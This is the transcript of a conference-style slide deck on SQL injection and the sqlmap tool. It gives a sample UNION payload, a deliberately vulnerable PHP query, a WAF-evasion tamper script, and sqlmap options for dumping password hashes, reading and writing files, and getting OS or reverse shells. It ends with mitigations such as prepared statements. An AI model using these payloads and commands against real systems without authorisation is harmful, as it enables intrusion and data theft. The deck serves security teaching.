This document discusses SQL injection and the sqlmap tool. It provides an overview of SQL injection, describes how sqlmap can be used to find and exploit SQL injection vulnerabilities, and demonstrates how it can be used to enumerate databases and files systems, and in some cases obtain remote access. It also discusses mitigation techniques like input sanitization and using prepared statements.

1. SQL injection with sqlmap
Herman Duarte <hcoduarte@gmail.com>
Tuesday, December 4, 12 1

2. About me
Consultant @ INTEGRITY S.A. - www.integrity.pt
Penetration testing engagements
BSc in Information Systems and Computer Engineering
CISSP Associate / ISO27001LA / CCNA
Security addict :)
Tuesday, December 4, 12 2

3. Roadmap
SQL injection (SQLi) 101
sqlmap
Mitigation techniques
Wrap-up
Tuesday, December 4, 12 3

4. SQLi 101: Definition
Definition:
SQL injection occurs when it is possible to inject SQL
commands in data-plane input in order to affect the
execution of predefined SQL statements
It affects any application that uses non-sanitized user-supplied
input, in dynamic SQL query constructions (e.g. web apps, fat
clients)
Cause:
Bad programming practices + Lack of knowledge/
awareness
Tuesday, December 4, 12 4

5. SQLi 101: Structure
...?name=robert’ union all select null,@@version,null #
Prefix Payload Suffix
$query = “SELECT name,status,age FROM user WHERE
name=’” . $_REQUEST[‘search’] . “‘ AND age > 42”;
Tuesday, December 4, 12 5

6. sqlmap
Developed in python
Prerequisites to run sqlmap:
Python 2.6.x or 2.7.x
To install:
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap
To update:
python sqlmap.py --update
git pull
Tuesday, December 4, 12 6

7. sqlmap
Mainly developed by:
Bernardo Damele A.G. Miroslav Stampar
(@inquisb) (@stramparm)
Tuesday, December 4, 12 7

8. sqlmap: Scenarios
Find and explore SQL injection in web applications
Direct connection (database account is needed)
DBMS python binding installed (e.g. PyMySQL)
-d <dbms>://<user>:<password>@<ip>:<port>/<db_name>
Tuesday, December 4, 12 8

9. sqlmap: Workflow
Select your target
Identify possible injection points
Identify SQLi vulnerabilities:
By using sqlmap
Manual testing :)
Exploit SQLi vunerabilities:
Enumerate
File system access
OS pwnage
Own the internal network (w00t! w00t!)
Tuesday, December 4, 12 9

10. sqlmap: Target selection
-u “<url>” (e.g. https://webapp.com/news.php?id=1)
-r <request file>
GET /news.php?id=1&Submit=Submit HTTP/1.1
Host: webapp.com
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: https://webapp.com/index.php
Cookie: PHPSESSID=l7uo2lheu067qrs8fjj0bab777;
DNT: 1
Tuesday, December 4, 12 10

11. sqlmap: Injection points
GET parameters
POST parameters
Cookie header values (only if --level >= 2)
User-Agent header value (only if --level >= 3)
Referer header value (only if --level >= 3)
Tuesday, December 4, 12 11

12. sqlmap: Finding SQLi (I)
./sqlmap.py -u “https://webapp.com/news.php?id=1”
or
./sqlmap.y -r news_get_request --force-ssl
Default behavior:
Tests all GET and/or POST parameters, for all SQLi
types, for all databases (if not discovered during tests)
Yes it may take a long time, and it doesn’t cover all tests
sqlmap can do.
Tuesday, December 4, 12 12

13. sqlmap: Finding SQLi (II)
--level=<level> (1...5 - default is 1)
With --level=5 every combination of payload, prefix and suffix
will be tested on all injection points available (noisier but gives
more coverage)
--risk=<risk> (0...3) - default is 1)
To do tests using OR --risk=3. Why? Imagine this:
UPDATE user SET disabled=1 WHERE email=email@email.com OR 1=1#
-p <param to test>[, <param to test>]
Tuesday, December 4, 12 13

14. sqlmap: SQLi techniques/types
--technique=SU (default is all of them: BEUST)
Boolean-based blind
Based on page changes, data is inferred, char by char
Error-based
Uses the errors that are displayed to extract data
Union query-based
Changes the SQL queries to extract data
Stacked queries
Semi-colon are used to inject multiple statements on the SQL query
Time-based blind
Based on time, data is inferred, char by char
Tuesday, December 4, 12 14

15. sqlmap: Supported DBMSs
--dbms=mssql | mysql | postgresql | oracle ...
Microsoft SQL Server SAP MaxDB
MySQL Sybase
PostgreSQL Firebird
Oracle SQLite
IBM DB2 Microsoft Access
Tuesday, December 4, 12 15

16. sqlmap: Logging / Verbosity
Logs all HTTP traffic in a text file: -t <output file>
Save options used in command line: --save <file>
Verbosity :
-v <0..6> (default 1)
-v 6 same as -t but, output to console
Tuesday, December 4, 12 16

17. sqlmap: Enumeration (I)
Objective:
Get data from the DBMS tables (limited the privileges the current
DBMS user have)
What can you get:
DBMS exact version, O.S. information, architecture and patch level: -f
DBMS banner: -b
DBMS server hostname: --hostname
DBMS user the application is using: --current-user
Applications current DB: --current-db
If the current user is a DBA: --is-dba
Tuesday, December 4, 12 17

18. sqlmap: Enumeration (II)
What can you get:
...
List the DBMS users: --users
List all DBMS users, password hashes: --passwords
sqlmap will automatically try to crack the hashes with a dictionary
attack
List users privileges: --privileges
List all available databases: --dbs
List all tables or just for a specific database:
--tables (-D <database name>)
Tuesday, December 4, 12 18

19. sqlmap: Enumeration (III)
What can you get:
...
List all columns or just for a specific table from that database:
--columns (-T <table name> -D <db name>)
Count table entries: --count
Dump data from a database/table/column:
--dump (-D, -T, -C can be used to select what data to dump)
--dump-all (I don’t recommend it)
Search for a specific or part of a database name, table name or column
name:
--search= (-D, -T, -C to specify what to search)
Tuesday, December 4, 12 19

20. sqlmap: Enumeration (IV)
What can you get:
...
Executing a custom SQL query:
--sql-query=”<sql query to execute>”
Interactive SQL shell to execute all your custom
SQL queries:
--sql-shell
Tuesday, December 4, 12 20

21. sqlmap: File system access
Objective:
Read and write any textual or binary file from the DBMS O.S.
Prerequisites:
DBMS = mssql | mysql | postgresql
Current DBMS user must have the necessary privileges
Read:
--file-read=”<file path>”
Write:
--file-write=”<file local path>”
--file-dest=”<remote file location path>”
Tuesday, December 4, 12 21

22. sqlmap: OS pwnage (I)
Objective:
Get access to the DBMS O.S. and the Internal network (if DBMS server in the
internal network)
Prerequisites:
DBMS = mssql | mysql | postgresql
Current DBMS user must have the necessary privileges
What can you do?
Get a reverse shell if the DB can:
connect to the internet
ping your server (yes an icmp shell :))
Establish a VNC connection
Tuesday, December 4, 12 22

23. sqlmap: OS pwnage (II)
To execute an OS command:
--os-cmd=”<command to execute>”
To get an OS shell: --os-shell
To get a meterpreter shell, an icmpshell or VNC:
--os-pwn
--msf-path=”<msf path>”
Store procedure privilege escalation (buffer overflow):
--bof
Tuesday, December 4, 12 23

24. sqlmap: Tamper scripts
Tamper scripts:
--tamper <script file path>[,<script file path>]
tamper/bluecoat.py
def tamper(payload, headers=None):
Example:
* Input: SELECT id FROM users where id = 1
* Output: SELECT%09id FROM users where id LIKE 1
Requirement:
* MySQL, Blue Coat SGOS with WAF activated as documented in
https://kb.bluecoat.com/index?page=content&id=FAQ2147
if payload:
retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)s+", r"g<1>t", payload)
retVal = re.sub(r"s*=s*", " LIKE ", retVal)
Tuesday, December 4, 12 24

25. sqlmap
DEMO
Tuesday, December 4, 12 25

26. sqlmap: Tips
If HTTPS is being used, don’t forget to set: --force-ssl
Get the most info as you can before starting to find SQLi
vulnerabilities. It will save you time.
Union-based gives more data with less requests, use it
Time-based blind SQLi is faster to check in comparison to
Union-based query (in cases where a lot of columns are
used)
If --is-dba=true, --technique=S you can start to gangnam
style
Tuesday, December 4, 12 26

27. Mitigation Techniques
Sanitize input
Use prepared statements / bind variables
Configure DBMS users configured with least-privilege
principle in mind
Use generic errors don’t pass them to the user
In case the web application source code can’t be
changed, a proxy can be used, between the web
server and the database server (e.g. GreenSQL)
Tuesday, December 4, 12 27

28. Wrap-up
Input sanitization
Use prepared statements
Least-privilege principle is your friend (use it!)
Have I said to use prepared statements ?! :)
Do code reviews
Tuesday, December 4, 12 28

29. References
https://sqlmap.org
Advanced SQL injection to operating system full
control - http://www.slideshare.net/inquis/advanced-
sql-injection-to-operating-system-full-control-
whitepaper-4633857
SQL Injection Attacks and Defenses - http://
www.amazon.com/Injection-Attacks-Defense-Justin-
Clarke/dp/1597494240
Tuesday, December 4, 12 29

30. Thank You!
Q&A
Herman Duarte
@hdontwit
https://www.linkedin.com/in/hcoduarte
hcoduarte@gmail.com
Tuesday, December 4, 12 30